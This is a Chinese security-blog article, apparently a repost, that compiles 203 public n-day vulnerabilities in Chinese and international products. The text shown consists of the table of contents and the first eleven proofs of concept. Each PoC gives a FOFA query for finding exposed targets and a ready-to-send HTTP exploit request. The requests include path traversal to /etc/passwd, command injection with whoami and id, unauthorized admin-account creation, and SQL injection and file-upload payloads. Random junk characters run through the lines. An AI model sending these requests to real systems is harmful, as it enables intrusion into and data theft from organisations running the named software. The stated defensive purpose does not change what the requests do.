互联网公开漏洞整理202309-202406
& X* z$ \, \' e4 h; r8 y z道一安全 2024-06-05 07:41 北京
3 n# s0 U6 S: K) o1 E以下文章来源于网络安全新视界 ,作者网络安全新视界( z) B1 C: T. V2 D7 Y
. r* E ^" Y9 ` b* ^* M6 \! e发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。( S1 R% ], k _( e; ]) ? v
& C1 w! p6 k; E- J3 U
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。; G# C2 {! ~; b" n# Z. q
5 U1 b: V( k4 a2 ~6 T4 `安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。 r' W/ n1 b, I9 a
' r) _# I a$ h. R8 z6 F+ N
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
7 o" \7 @$ l9 t4 y; \
( a, n5 A: }$ k合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。: u' k7 U( P! W$ e; o
. `7 p3 m4 _ O! j
) d. _2 n6 R7 K5 P8 M声明9 L6 d. @: J; M9 u8 X+ }0 V
6 y4 a0 U( O% y ^( Z为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。, C0 | @% E* D
& W- Q1 i& g v& K" V有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。8 F. ?- @7 i! f3 f: f
+ `- B; `4 F- \& s0 B+ c6 G2 K2 i: v5 E' s8 \7 ~* v0 S
- R9 G5 m3 L6 a, t5 m" m1 x& _# k
目录
0 I8 A/ w! d! @9 j( o: i' n1 ]' _
+ O* E4 f1 B6 h4 y01
d4 a$ m. b4 O' w6 S, e. ~" G8 j
0 ]- r" R v! U! V% ~1. StarRocks MPP数据库未授权访问
: t" [2 c) j* w0 k5 o2. Casdoor系统static任意文件读取$ i% @5 x% [. [; d
3. EasyCVR智能边缘网关 userlist 信息泄漏
1 k7 W* U E4 c1 g6 D4. EasyCVR视频管理平台存在任意用户添加7 B- ~ d8 e' I7 P9 E8 t; y
5. NUUO NVR 视频存储管理设备远程命令执行; k( V( t0 s; D, i1 e& Y1 k
6. 深信服 NGAF 任意文件读取5 V9 ]6 n% {8 V
7. 鸿运主动安全监控云平台任意文件下载# N9 _" V% ]8 R) r! ^7 R
8. 斐讯 Phicomm 路由器RCE
' G# I7 X2 K0 B, }7 x$ d1 ~9. 稻壳CMS keyword 未授权SQL注入: k) `) o' H; x' H
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
: \$ b- V8 f7 [11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
+ E: o2 A) W' y5 N |12. Jorani < 1.0.2 远程命令执行
# M8 s3 D. N- j: k9 d" t13. 红帆iOffice ioFileDown任意文件读取
# ~5 o3 Y7 E) |5 U. u14. 华夏ERP(jshERP)敏感信息泄露7 z8 x6 _* _% M0 H6 Q/ c# n
15. 华夏ERP getAllList信息泄露
9 _' q9 o( I1 Y; u ^7 |16. 红帆HFOffice医微云SQL注入' t, j# L! S% s4 x0 D- f7 u b
17. 大华 DSS itcBulletin SQL 注入+ U& B3 |" _8 l" p* n# m: M6 d
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
$ a. s3 F. |1 Q% I19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
5 U! j3 P- U9 g' j/ n4 ?' O20. 大华ICC智能物联综合管理平台任意文件读取0 g6 i% v+ ]$ A; n
21. 大华ICC智能物联综合管理平台random远程代码执行
# k2 G- Y8 m$ ?* K2 Q0 q, u22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" s- P$ F4 q" b' r3 ]( z23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
9 q0 O6 o# i! [# T& M& _5 o8 d24. 用友NC 6.5 accept.jsp任意文件上传( O! N% u) V/ Z5 q2 |+ I
25. 用友NC registerServlet JNDI 远程代码执行
3 l! [" o6 X; G- B3 W26. 用友NC linkVoucher SQL注入
. @; z% ~5 a; f" N" u/ h& `8 z27. 用友 NC showcontent SQL注入
- ^6 T% U p7 ^28. 用友NC grouptemplet 任意文件上传
. K h" j6 g$ A! Z% T5 R29. 用友NC down/bill SQL注入
0 s; f g( x, [30. 用友NC importPml SQL注入
_9 _7 I3 B, @- u/ Y: g- P31. 用友NC runStateServlet SQL注入
E9 N% U$ B1 U+ C7 U* [32. 用友NC complainbilldetail SQL注入 h1 ?6 D9 S. c9 H
33. 用友NC downTax/download SQL注入) K: }( s# Y$ o' A9 C6 v
34. 用友NC warningDetailInfo接口SQL注入
( [6 r3 u8 _4 U+ j- ]6 \* M: m35. 用友NC-Cloud importhttpscer任意文件上传; Y# N, b/ x; D
36. 用友NC-Cloud soapFormat XXE: h! e; \- K5 d3 C8 a& b
37. 用友NC-Cloud IUpdateService XXE: c4 p) v" D3 x4 `% q5 e" Z- r [
38. 用友U8 Cloud smartweb2.RPC.d XXE( A: Z* e' |2 Z/ b; N6 I2 h
39. 用友U8 Cloud RegisterServlet SQL注入4 O* [4 I/ G5 ^. R- w" h( l
40. 用友U8-Cloud XChangeServlet XXE% L( i; s5 h# \8 D
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. c3 `3 I, L1 M) _2 T42. 用友GRP-U8 SmartUpload01 文件上传6 V. L% n5 ]: C! M$ v
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# h! \, i+ }" o: _7 U( V44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ q6 H3 V/ p6 A* L+ _# ]$ }( p45. 用友GRP-U8 ufgovbank XXE# Y/ z- Z" M: C: G
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
- E5 I7 K8 w1 V7 c; Y( u47. 用友GRP A++Cloud 政府财务云 任意文件读取8 t& W/ ?& r. z# z/ q' e& Y# v
48. 用友U8 CRM swfupload 任意文件上传8 x+ X9 \( i4 J- Y! y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传% U: Q {3 T" J' P1 B+ @ g
50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ U5 B1 G( x0 @. U! x2 A; o- g% U51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入# H5 x* T7 C4 E+ q( ^% M
52. 泛微E-Office json_common.php sql注入
+ f# h3 c7 a: G" h4 V53. 迪普 DPTech VPN Service 任意文件上传
% T$ j; v. \9 c B" W54. 畅捷通T+ getstorewarehousebystore 远程代码执行
) F: N N2 D a6 k55. 畅捷通T+ getdecallusers信息泄露
k0 X& P/ _" W9 b56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 `3 w6 `: G$ k57. 畅捷通T+ keyEdit.aspx SQL注入& }# x7 }/ y4 P( c+ L) s
58. 畅捷通T+ KeyInfoList.aspx sql注入
3 @$ T' r8 V1 L9 `59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行3 E; P" O T$ r8 l3 t
60. 百卓Smart管理平台 importexport.php SQL注入' Q* r5 r" _5 g" R/ c/ U/ h0 G$ B
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传1 ~. Z! p) A6 o: d' U
62. IP-guard WebServer 远程命令执行* v4 a. {* ?; r
63. IP-guard WebServer任意文件读取& M) b/ }! h$ l: g! u
64. 捷诚管理信息系统CWSFinanceCommon SQL注入, l" z( c0 {8 O% ?# S
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
$ {0 p) V- o3 t66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
# S8 F! z3 t: X+ K: q67. 万户ezOFFICE wpsservlet任意文件上传# ^ S6 x1 f, ^& p% Q
68. 万户ezOFFICE wf_printnum.jsp SQL注入4 c/ ~. c" w ?" u
69. 万户 ezOFFICE contract_gd.jsp SQL注入
$ j7 N* ^* G3 Z) E* e70. 万户ezEIP success 命令执行
3 r B/ H' ~8 s5 ^! z3 ~8 Y7 q71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入. T! X; y5 M% D
72. 致远OA getAjaxDataServlet XXE/ L- _( f; t: \1 o
73. GeoServer wms远程代码执行
% w' m0 s4 }7 w# g& y7 m7 }5 O! f74. 致远M3-server 6_1sp1 反序列化RCE* G7 M! d- V6 d4 n+ u& y9 a
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; a4 K& _. j, h$ H6 W: V) Y76. 新开普掌上校园服务管理平台service.action远程命令执行8 z$ y0 k7 F) N: t. t, J
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
- Y/ n. L% I/ ?. R7 m, |1 R78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传$ C. h) e1 r' S( l; T |
79. BYTEVALUE 百为流控路由器远程命令执行
% t/ v# s- B! o; J80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
9 k" u6 T4 X& ~. U# ], n; M# d w81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露9 s4 E- Z8 R3 D9 v) H& g- k8 ?
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行5 @# Q3 b0 _; j N$ Z) q" { K0 x0 G* a
83. JeecgBoot testConnection 远程命令执行
7 w0 S) L8 h/ |5 J m9 X2 {! c84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
( O# E* [2 ]0 i" L0 y. g' @85. SysAid On-premise< 23.3.36远程代码执行
9 {4 O5 M3 s1 }; e. r/ e+ X4 ]9 n86. 日本tosei自助洗衣机RCE- G2 i. n- T5 R; i1 ]
87. 安恒明御安全网关aaa_local_web_preview文件上传3 m6 ]" N) D3 |& \
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行2 Y0 G$ @) r5 f" n
89. 致远互联FE协作办公平台editflow_manager存在sql注入
* H# I0 ?, W$ ?+ Z7 r90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! m) L' w. l, D4 F$ s
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
. D7 C" j. X7 a9 B; U5 Q. T92. 海康威视运行管理中心session命令执行
9 d8 a, M# |: p3 M93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
- |8 _( A& B5 \1 k94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ e2 s: o6 c. |) ~
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
! _& Y& i" m- Y% r/ E) r; H96. Apache OFBiz 18.12.11 groovy 远程代码执行# q9 Z8 G- ?1 h4 E2 d( z
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行5 [7 n) g2 I# l$ M
98. SpiderFlow爬虫平台远程命令执行
; w; w3 e! p Z/ _ S n8 b99. Ncast盈可视高清智能录播系统busiFacade RCE
( b5 Y4 H7 h! G9 I( a. B100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传% @# H1 A5 K; Q$ F
101. ivanti policy secure-22.6命令注入
0 W! w& P9 L% |. x8 d102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
; K' k+ T4 u* H103. Ivanti Pulse Connect Secure VPN XXE
. Y$ q4 V6 t- q' s5 D* n104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 ^! y& a' L, @1 ]3 V105. SpringBlade v3.2.0 export-user SQL 注入; X3 @; V7 p2 C- `/ `4 R% I
106. SpringBlade dict-biz/list SQL 注入
+ b# U* a/ @3 b0 L4 m107. SpringBlade tenant/list SQL 注入
. b2 P6 u, z2 b, h+ I108. D-Tale 3.9.0 SSRF
) Q, N( o$ E/ c" i* y ~ R2 V109. Jenkins CLI 任意文件读取
+ c- ~% Q) o' z( o9 H110. Goanywhere MFT 未授权创建管理员/ B/ q* [1 [# _! B6 T
111. WordPress Plugin HTML5 Video Player SQL注入
- g) E9 b0 w( i* i- z/ u$ S112. WordPress Plugin NotificationX SQL 注入
: O9 |, x! R7 y: U- x113. WordPress Automatic 插件任意文件下载和SSRF
7 n" |) ~+ _! e1 _, p114. WordPress MasterStudy LMS插件 SQL注入
, ^5 s) R8 w b$ {( A& W1 ?115. WordPress Bricks Builder <= 1.9.6 RCE
5 o" q" G8 z/ r" Y" X- w5 T& T116. wordpress js-support-ticket文件上传
. m2 |6 }# _ S9 c" J0 _# }117. WordPress LayerSlider插件SQL注入
1 K( ?1 P# e6 X3 @118. 北京百绰智能S210管理平台uploadfile.php任意文件上传, u2 V& z! s% v8 Z
119. 北京百绰智能S20后台sysmanageajax.php sql注入
8 V& J- m+ F6 y/ N# i* I1 U120. 北京百绰智能S40管理平台导入web.php任意文件上传
2 r9 g. K( g9 m5 A" b121. 北京百绰智能S42管理平台userattestation.php任意文件上传
& _ q! V- T& c9 V3 D% c122. 北京百绰智能s200管理平台/importexport.php sql注入
% ^8 ?, i/ P6 [* Z0 v7 Q. X v123. Atlassian Confluence 模板注入代码执行
8 B( s- m. E. O( v/ e124. 湖南建研工程质量检测系统任意文件上传
& C1 j, D' h: @3 w. z8 V125. ConnectWise ScreenConnect身份验证绕过
& I. H1 @# L& @' [126. Aiohttp 路径遍历
5 F0 {5 Q* b* ?" l8 o127. 广联达Linkworks DataExchange.ashx XXE
6 N. c$ [' G3 Y9 f/ i6 f128. Adobe ColdFusion 反序列化1 K, p. C* n1 s+ c: {; {( C0 C& T( I
129. Adobe ColdFusion 任意文件读取
! P* ?5 M) [. c5 L5 P130. Laykefu客服系统任意文件上传& n, t& Y/ b0 @/ S
131. Mini-Tmall <=20231017 SQL注入
) F4 [) Q! k6 d' W/ J! J" X+ t, m132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
$ p; ~% I+ X# u ~/ j0 c) {133. H5 云商城 file.php 文件上传5 _7 r6 h, o2 [" V! ]
134. 网康NS-ASG应用安全网关index.php sql注入
3 |; Z$ `* Q2 f* b% r135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
, Q7 S# h5 |+ a" S/ S136. NextChat cors SSRF
+ A2 y7 o, \1 R0 G6 y* i" ~) |137. 福建科立迅通信指挥调度平台down_file.php sql注入* ?2 X; W& H, H6 t3 R* K4 m- g
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
6 |5 I# e3 V$ q1 k, A139. 福建科立讯通信指挥调度平台editemedia.php sql注入. |' s$ b7 E7 t
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
. w( k# f, g j141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
2 Z( M* ^9 X3 W6 j* Z- |142. CMSV6车辆监控平台系统中存在弱密码
) D' Y6 n8 [1 b* i: N143. Netis WF2780 v2.1.40144 远程命令执行
( G* ?; u- m/ K* r; l6 N144. D-Link nas_sharing.cgi 命令注入 h# g8 W. O3 y3 F. M* Z0 ` @
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
, q1 {/ A' n) T( H146. MajorDoMo thumb.php 未授权远程代码执行7 ~9 F& p4 X8 D+ z1 C/ V% b* N
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: B7 d. t, e* k9 W9 C8 R
148. CrushFTP 认证绕过模板注入8 J' F0 A5 B4 e5 y3 R/ q% ^7 Y
149. AJ-Report开源数据大屏存在远程命令执行' B0 s) X6 `+ V6 {# Y5 P
150. AJ-Report 1.4.0 认证绕过与远程代码执行# {! K0 z5 T4 K8 g
151. AJ-Report 1.4.1 pageList sql注入
$ y5 l8 j/ s: w152. Progress Kemp LoadMaster 远程命令执行
7 x1 V9 c8 V! `. J D* ?153. gradio任意文件读取
/ h: o7 X1 u6 p154. 天维尔消防救援作战调度平台 SQL注入
) O- F8 J9 A" b7 d7 i7 _. J3 V155. 六零导航页 file.php 任意文件上传/ F t# k: l* {* V w
156. TBK DVR-4104/DVR-4216 操作系统命令注入$ t$ g( B' ?* Y$ C
157. 美特CRM upload.jsp 任意文件上传
. I* e% m8 C8 Z) x0 G" A% ] P) S158. Mura-CMS-processAsyncObject存在SQL注入) ^- s* H- A4 g& G( l/ u
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
& Z5 _9 y1 e# Y/ N160. Sonatype Nexus Repository 3目录遍历与文件读取
9 @1 W- k& r* `* s$ M0 j: \161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
7 {1 f5 r5 {/ r0 g162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
! w- ^9 a7 D- E0 h( k% i& d& y `163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
4 }; e' e4 J* Q+ X164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传% D' D9 Q$ N; o* V5 k: K
165. OrangeHRM 3.3.3 SQL 注入. Q u8 r9 |* e! ~$ {. d5 @% v
166. 中成科信票务管理平台SeatMapHandler SQL注入" f& M# \3 O$ H# f& b7 q9 |
167. 精益价值管理系统 DownLoad.aspx任意文件读取; y5 E, t- Y n: I
168. 宏景EHR OutputCode 任意文件读取; f9 g h1 k$ k' e! Q0 p
169. 宏景EHR downlawbase SQL注入# D' D* q4 D! D8 X
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
$ Z8 _" F& j7 v$ ?% j3 t171. 通天星CMSV6车载定位监控平台 SQL注入
+ ?' ?: R: {9 g7 Q9 N; }9 s4 ~ z172. DT-高清车牌识别摄像机任意文件读取
( T7 U" g# I- z; J- H173. Check Point 安全网关任意文件读取
" A( l9 l+ ?, M0 g3 D0 B: x( p174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% L0 P' |4 @% ^5 q! {& j7 }9 T175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
c X* p2 n3 g9 a176. 电信网关配置管理系统 rewrite.php 文件上传
. W" i6 ~( v. H$ U177. H3C路由器敏感信息泄露$ L8 J7 _8 [! A* I1 N! M0 V
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- f( O/ b! G, a179. 建文工程管理系统存在任意文件读取" P* h) P3 \6 @2 z' u* Y r
180. 帮管客 CRM jiliyu SQL注入$ U! F- z5 U; o- X5 }
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
" k& f* |% z9 }0 t% @/ I182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
! h4 G! X; K& m) U5 I. X. |. o183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入) f2 g1 ^6 Z/ _( a; M/ l& U- t; m
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加( }, `) d0 h: D' w
185. 瑞友天翼应用虚拟化系统SQL注入
9 W0 ?1 E! R2 a, G7 c186. F-logic DataCube3 SQL注入
7 ^, S% z% X) X187. Mura CMS processAsyncObject SQL注入
( E( f6 I7 s! j1 k9 z5 E: o$ n) e188. 叁体-佳会视频会议 attachment 任意文件读取
2 e, d [: s# R3 o7 u4 K189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 c( s @+ H: a5 R E* D j2 o190. 短视频矩阵营销系统 poihuoqu 任意文件读取0 k5 a! P% g0 W2 x L
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
2 f' x2 q- P1 \192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 a$ K7 u( Z! r" S- O- q* Z
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行' Q" r) n, g Y `$ d! B' e- R
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
9 S1 C6 R8 Z/ e2 d; Q) Z5 X; y195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
: M: y6 _( d% m' X; P/ [196. 河南省风速科技统一认证平台密码重置( b& B3 y. {/ ] N, @
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: [, H, S- f& }. ^( @* ?198. 阿里云盘 WebDAV 命令注入
. W; N2 i/ P- o' @0 p( M- b199. cockpit系统assetsmanager_upload接口 文件上传/ u' b4 q) N- [3 \0 U
200. SeaCMS海洋影视管理系统dmku SQL注入
2 w6 ^* T$ ]6 `9 L201. 方正全媒体新闻采编系统 binary SQL注入% M1 p( J' P* Y. E( |3 I- l8 B
202. 微擎系统 AccountEdit任意文件上传
; ?, u1 s3 F* @: V203. 红海云EHR PtFjk 文件上传1 T: B' w# C- a) ?, B/ U
/ x6 E/ ?3 b- K! D% Z
POC列表3 e7 R C/ S2 V7 I, `- I) G
1 a& V8 y: ~; K) E0 o
02; ?; Q: d2 i# B9 W: B) M+ B
/ z; _. w; U1 O
1. StarRocks MPP数据库未授权访问
) _5 _) W1 m/ EFOFA :title="StarRocks"! y. a, x3 z/ a8 S( E0 m# ^
GET /mem_tracker HTTP/1.1
4 c7 W: ]1 E$ Q9 j8 dHost: URL( d$ `8 ~$ }# u
7 n$ t6 o2 z. G! I
6 v2 v' e+ H' Q+ A8 p2. Casdoor系统static任意文件读取) S+ j# N @, Q8 D7 v" ~
FOFA :title="Casdoor"
' z, ?+ p, s, C5 _; r( IGET /static/../../../../../../../../../../../etc/passwd HTTP/1.15 K! S) g0 a6 W! f! m: u7 q' l
Host: xx.xx.xx.xx:9999/ A6 W$ P) J9 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: L) n( Y0 P, j/ @Connection: close
0 P, {) m! L% {% l7 z0 {* w$ aAccept: */*! V5 p. \7 v: z# d* l6 }4 N' ]
Accept-Language: en
& I9 N! [# v: ~. jAccept-Encoding: gzip
9 n/ T/ m+ h5 W* z& v3 O2 V; Z1 F/ y F
) q( [; x; Y6 L1 d1 O& l; c3. EasyCVR智能边缘网关 userlist 信息泄漏
c& R3 [! p6 @7 \, @1 n' pFOFA :title="EasyCVR"
2 ~( @) Y( j+ X7 |5 X/ ZGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
! ? k" w u4 _" ZHost: xx.xx.xx.xx
9 v4 g. \' ]! w9 I- z, K5 Z
0 R" ?4 o( d+ ?# }' |3 e& y' e1 ]# s: n/ K m
4. EasyCVR视频管理平台存在任意用户添加
& k8 B- f" Y- y9 l. C) vFOFA :title="EasyCVR"' s( E) `# m T; O
4 e% V; D8 f( t B) X2 h
password更改为自己的密码md5' v! s- x, h @8 w- q
POST /api/v1/adduser HTTP/1.1
8 B* [# }6 {7 I0 Z+ s5 vHost: your-ip
. i6 A4 x6 h9 m" F1 n6 mContent-Type: application/x-www-form-urlencoded; charset=UTF-8
; D: N& ^/ }# }9 I, p
& t6 [- O2 V- o4 Yname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
3 C2 p8 c6 m8 @9 P+ A% N, Q4 a# P. U# S2 m! k! j% Y
! x- l d5 j1 a) B0 b4 c$ j5. NUUO NVR 视频存储管理设备远程命令执行
% M9 t1 u( c) e- O9 ?! ]) g$ gFOFA:title="Network Video Recorder Login"
- ~! b: B1 u0 M# t1 wGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Q" m# x, J" N" X' M9 M( hHost: xx.xx.xx.xx3 ^. N* W6 r3 R5 I( o5 S3 {' R
$ |3 h5 }, S8 Z" L' Z; o
/ w1 A, B, u' f& B% T6. 深信服 NGAF 任意文件读取: S; ]5 j' y' h- }! }
FOFA:title="SANGFOR | NGAF"7 ^$ U# U" n1 y# n* ~" ?
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
: t0 H6 F1 @% W2 t. O) hHost:
c" R+ s2 T* A" P
$ M6 p) b9 y8 W# M$ X/ ?0 B) d/ E: u$ _! N: z. v& @+ G* r, W
7. 鸿运主动安全监控云平台任意文件下载
$ \+ J6 @9 F4 M2 M( p" j0 C+ K/ DFOFA:body="./open/webApi.html"
' F) I. j2 l8 |+ c- rGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
0 n8 n/ k/ C% p+ r; k. \Host:: e; t9 \( R, o) Z8 t+ M+ Q
4 }" t0 m6 J4 K
. W- }. Q$ E. _- d8. 斐讯 Phicomm 路由器RCE( R3 V7 Z, w7 J/ u% i9 I
FOFA:icon_hash="-1344736688"
* o7 e- [1 q" i& H7 ]4 H+ \" m默认账号admin登录后台后,执行操作
& d# {5 Y, M. u z% APOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ S% p ^0 X/ J% n* M# X, cHost: x.x.x.x
1 S( S2 M9 O; b3 l6 [" JCookie: sysauth=第一步登录获取的cookie4 [ M- c" [$ @& D+ o7 ~; @1 J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
8 G+ b8 z( D7 Z C5 F6 C4 r oUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
. A& b* S* ]1 b p1 `/ G2 o, ^. x$ c
------WebKitFormBoundaryxbgjoytz
! r" v+ J' K1 \8 X5 W$ c+ MContent-Disposition: form-data; name="wifiRebootEnablestatus"
2 U2 D! d6 ^5 z. {9 R* V/ n+ m1 _5 y7 W" F( \4 \1 c
%s
* @6 k0 w: W: y- D------WebKitFormBoundaryxbgjoytz; P/ P1 ?0 W, p/ O( a
Content-Disposition: form-data; name="wifiRebootrange"; e1 }! t2 ]& ~
5 V$ x% m9 w' c0 i12:00; id;
* r: B1 P+ o; [6 x4 C' J. `/ ~, ]3 l------WebKitFormBoundaryxbgjoytz; o! n; F' j+ N5 X9 [! z
Content-Disposition: form-data; name="wifiRebootendrange"
4 g/ ^) T) f, o( a" u5 Y
- ^2 `' L7 K$ k9 T% z%s:6 A' k$ G ^6 s8 |' r
------WebKitFormBoundaryxbgjoytz0 {) q1 Z% ~& e) d' n
Content-Disposition: form-data; name="cururl2"
4 P; o, g/ f; |. b; C. u$ j# x) d9 k# {2 A3 o
, s% u+ x# [ c. |+ `+ O- T4 d- e------WebKitFormBoundaryxbgjoytz--4 X. [$ g) p C6 S" Y0 ^
7 |' E' }( Z# k* Q# F8 Q9 p3 }
: v$ Y( j+ k& t1 v2 V$ O6 [
9. 稻壳CMS keyword 未授权SQL注入
9 q; a9 v! y* }5 C) Z* iFOFA:app="Doccms"
) a4 ~: f0 R0 ?" V/ qGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
, L: i" x0 \# Q# bHost: x.x.x.x
! P5 O1 g8 C9 w: {+ i# ~; f" Y: N4 B3 Z5 d
$ ^# y& e+ w' ]
payload为下列语句的二次Url编码. f" y- @2 u) X/ H0 A$ Z3 K
8 z2 p- b1 Z" L; K. `" y, o+ c8 i' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
' G( g6 n1 s/ j y0 u8 ?4 }$ |4 {
: a* F5 G) c8 d1 i5 }10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
, W: C' }" e; \+ O" ~FOFA:icon_hash="953405444"8 P9 L; y' V4 H$ Z4 M
* ^6 @( v" X# j0 a" C
文件上传后响应中包含上传文件的路径% R& T {- R" N1 l
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
. ^4 \- u, X: k' z% r6 RHost: x.x.x.x:xx9 h/ o& z1 f6 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36, D* J8 {, l S, m. Q& G2 u: R5 `
Content-Length: 197
* o9 Z0 i" j" x( `3 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# ~& c2 h( j) H" B9 \- ]2 O: A2 w" u
Accept-Encoding: gzip, deflate& K& M! |: y! U% ?" |6 q
Accept-Language: zh-CN,zh;q=0.9
& m: e! C1 a9 a' L1 [Connection: close
; j. r. K; \, d0 d, c& e1 QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu+ {3 r; x1 M) A0 A
9 t2 d$ C- ~! h8 [2 E3 U3 e
------WebKitFormBoundaryxdgaqmqu9 \) x3 A9 c- X% R- w: {3 C8 p; t
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
0 V: K' f9 Y F% M* QContent-Type: text/html" K8 I r+ T f, w6 D2 ~" ]9 c
* U. o+ c9 K) n' G# m; ?1 i( b
jmnqjfdsupxgfidopeixbgsxbf
6 q; P! M, v/ b4 |" [; E: I------WebKitFormBoundaryxdgaqmqu--
9 l, \4 e$ I4 }5 o1 a/ t" j
9 I) c( U$ ^# e9 V5 F: `" \% n' v
e: w; |) ]& D, f11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入* @- e& T$ R2 j! f
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"" g2 @! e% j3 Y) F/ f
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1* ]6 d' Q. @: r# _# M
Host: 127.0.0.1& y/ ]) u7 e' U U
